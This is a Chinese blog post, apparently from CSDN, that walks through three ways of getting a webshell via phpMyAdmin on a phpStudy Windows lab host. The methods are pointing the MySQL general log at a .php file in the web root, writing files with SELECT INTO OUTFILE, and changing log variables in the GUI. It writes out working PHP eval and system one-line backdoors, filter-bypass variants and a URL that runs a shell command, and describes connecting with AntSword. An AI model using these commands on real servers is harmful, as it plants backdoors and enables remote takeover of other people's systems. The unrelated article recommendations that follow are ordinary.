PhPMyadmin

最新推荐文章于 2024-08-06 22:47:32 发布
最新推荐文章于 2024-08-06 22:47:32 发布
阅读量301 收藏 4
点赞数 9
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63944205/article/details/140889591
版权

环境搭建

安装mysql管理工具

漏洞复现

姿势⼀:通过⽇志⽂件拿Shell

        利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。

show global variables like '%general%';
set global general_log='on'; //⽇志保存状态开启;
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/mafa.php' //修
改⽇志的保存位置。
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
bypass:
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

设置日志保存地址

查询php木马

日志中成功出现我们的一句话木马

用蚁剑连接

姿势⼆:导⼊导出拿WebShell

思路:通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。

1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)

上传我们的一句话木马后门到网站根目录

用蚁剑去链接

姿势三:界⾯图像化GetShell

phpmyadmin管理台
变量:⽇志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";

找到变量搜索

这里我们看到了日志保存位置

我们可以手动去改这个日志保存位置

 剩余步骤同姿势一

select 我们的一句话木马,然后访问日志 ,即可获得后门.

丢了没
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyAdmin
08-18
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
Phpmyadmin
07-26
**phpMyAdmin** phpMyAdmin 是一个开源的、基于Web的MySQL数据库管理工具,它允许用户通过浏览器界面轻松地执行各种数据库操作,如创建、修改和删除数据库表,执行SQL查询,管理用户权限等。这款工具是用PHP编程...
phpmyadmin
08-27
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料...
phpMyAdmin.zip
05-11
phpMyAdmin——高效管理MySQL数据库的神器》 phpMyAdmin是一款广受欢迎的开源Web界面工具,用于管理和操作MySQL数据库。在PHP编程语言的支持下,它为用户提供了友好的图形化界面,使得非专业程序员也能轻松进行...
Android 在布局中tools使用
追梦的鱼儿
08-06 188
在布局中因为各种原因,有时想让控件不显示,或者显示占位图的话,可以使用。
Android渠道包配置不同AndroidManifest.xml
wolf0706的专栏
08-02 281
开发中不同的渠道包需要使用不同的AndroidManifest.xml,比如Flavor1 需要添加android:sharedUserId="android.uid.system"配置,可以新建一个AndroidManifest_system.xml。Flavor1 渠道打包会融合AndroidManifest.xml和AndroidManifest_system.xml两个配置文件。
Android进阶之路 - 字体加粗,定制化字体粗度
Android、前端、小程序、后端
08-06 679
在客户端中不论是PC端,还是移动端主要价值之一就体现在用户交互方面,也就是用户体验了,接下来讲的是很常见的字体加粗问题
Android14音频进阶之命令行播放音频(八十)
Android系统攻城狮
08-06 63
本篇目的:Android14上,当我们没有app,又想测试mp3、aac、wav等音频时,这时候我们可以使用stagefright解码、播放音频文件。Stagefright 是 Android 系统中的一个多媒体框架,用于处理各种音频和视频文件格式。它提供了解析、解码、编码和播放多媒体内容的功能。Stagefright 框架包括多种组件和库,负责不同的多媒体处理任务。通过 Stagefright,Android 设备能够高效地播放和处理多媒体内容。
Android 拨号键拨号,中心方向键拨号
qq_46687516的博客
08-06 63
/vendor/mediatek/proprietary/packages/apps/Dialer/java/com/android/dialer/dialpadview/DialpadFragment.java @Override public boolean onKey(View view, int keyCode, KeyEvent event) { if (view.getId() == R.id.digits) { //*/ add ok key to call
Android原生设置Settings 具体Fragment和Activity界面跳转实现
wenzhi的博客
08-03 838
Android 原生设置Settings中如果要跳转到某个界面,如何实现?从代码上看,只能看到某些Activity的跳转,或者一些主要的Fragment是有暴露的,而对于多层级的Fragment 没看到有代码有直接暴露的代码。这种情况,如果要跳转到某个Fragment,要如何实现呢?其实原生Settings 对这块需求是有设计实现功能的,可以实现跳转到某个未暴露的Fragment 界面,但是有个限制:跳转未暴露的Fragment 应用需要是系统签名uid=1000d的应用,不然会报错。
Android进程保活:如何让app一直运行
qq_40853919的博客
08-02 1138
1)为什么需要进行进程保活呢?需求是什么?2)进程分类3)进程的优先级4)如何提高进程优先级5)如何进行进程保活。
第二十二天学习笔记2024.8.6
shenxiaode的博客
08-06 524
mysql> mysql -u liyang -pabc_123 -h 192.168.1.26 -P3306 --get-server-public-key (获得master服务器的公钥) (在从服务器中输入)(然后退出登录本机数据库)mysql> grant replication slave on *.* to '' 'liyang'@'%';启动主从服务器的服务(不能在从服务器中写数据)(从服务器密码就是主服务器的密码)从主服务器上下载 /usr/local/mysql/my.cnf(修改)
永久删除的Android 文件去哪了?在Android上恢复误删除的消息和照片方法?
qq_23996309的博客
08-06 617
丢失重要消息和照片可能是一种令人沮丧的经历,尤其是在您没有备份的情况下。但别担心,在本教程中,我们将指导您完成在Android设备上恢复已删除消息和照片的步骤。无论您是不小心删除了它们还是由于软件问题而消失了,这些步骤都可以帮助您检索宝贵的数据。
mysql主从服务器配置
qq_74793290的博客
08-06 314
MySQL主从服务器配置
如何在 Android 设备上更改您的位置?
学以致用 知行合一
08-02 760
全球定位系统 (GPS) 是一种基于卫星的导航系统,用于确定设备在地球上的当前位置。Android 设备配备了 GPS 接收器,可与绕地球运行的卫星进行交互。一旦设备锁定至少四颗卫星,它就可以通过计算信号从每颗卫星传输到设备所需的时间来三角测量其位置。这个过程称为三边测量,可以精确确定地理坐标。您是否曾觉得需要在 Android 设备上虚拟更改您的位置?无论是为了访问受地理限制的内容还是为了好玩而伪造 GPS,更改您的位置都比您想象的要容易。
【PHP小课堂】PHP中的数组函数学习(三)
硬核项目经理
08-05 558
PHP中的数组函数学习(三)继续我们关于 PHP 中数组函数的学习之旅。之前就说过,数组相关的操作函数非常多,功能也非常的丰富,所以大家不要着急,还是跟着我一步一步地学习了解。毕竟有些函数确实是不太常用,但在许多业务场景下,却又会无比的方便。在这其中,最主要的是你在这个业务场景下,会不会想到系统已经默认提供的这些函数。所以,不要求全部掌握,但心里有个印象就可以了。数组搜索首先是数组搜索的功能,其实...
安卓中Fragment的生命周期
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-06 262
销毁状态:Fragment总是依附于Activity而存在,因此当Activity被销毁时,与它相关联的Fragment就会进入销毁状态。停止状态:当一个Activity进入停止状态时,与它相关联的Fragment就会进入停止状态,或者通过调用FragmentTransaction的remove()、replace()方法将Fragment从Activity中移除,但在事务提交之前调用了addToBackStack()方法,这时的Fragment也会进入停止状态。
【安卓】动态加载布局技巧
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-06 415
其中,large就是一个限定符,那些屏幕被认为是large的设备就会自动加载layout-large文件夹下的布局,小屏幕的设备则还是会加载layout文件夹下的布局。最小宽度限定符(smallest-widthqualifier)允许我们对屏幕的宽度指定一个最小值(以dp为单位),然后以这个最小值为临界点,屏幕宽度大于这个值的设备就加载一个布局,屏幕宽度小于这个值的设备就加载另一个布局。将多余的代码删掉,只留下一个左侧Fragment,并让它充满整个父布局。
Cairo库移植到安卓记录
最新发布
Tracker647的博客
08-06 299
Android Studio引入ndk编译的so库的故事,这个东西搞了两周以后,由于自己不熟悉Java和安卓开发,踩了不少坑,其中一周时间都是花在怎么用Android Studio上的。。。AS下的新版本Koala,结果网上资料全是旧版本,很多设置完全不同,遇了问题经常不知所措,后面不得已,换成了老一点的2021 dolphin版本,也学会了看安卓官网资料,逐渐才稳定下来。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值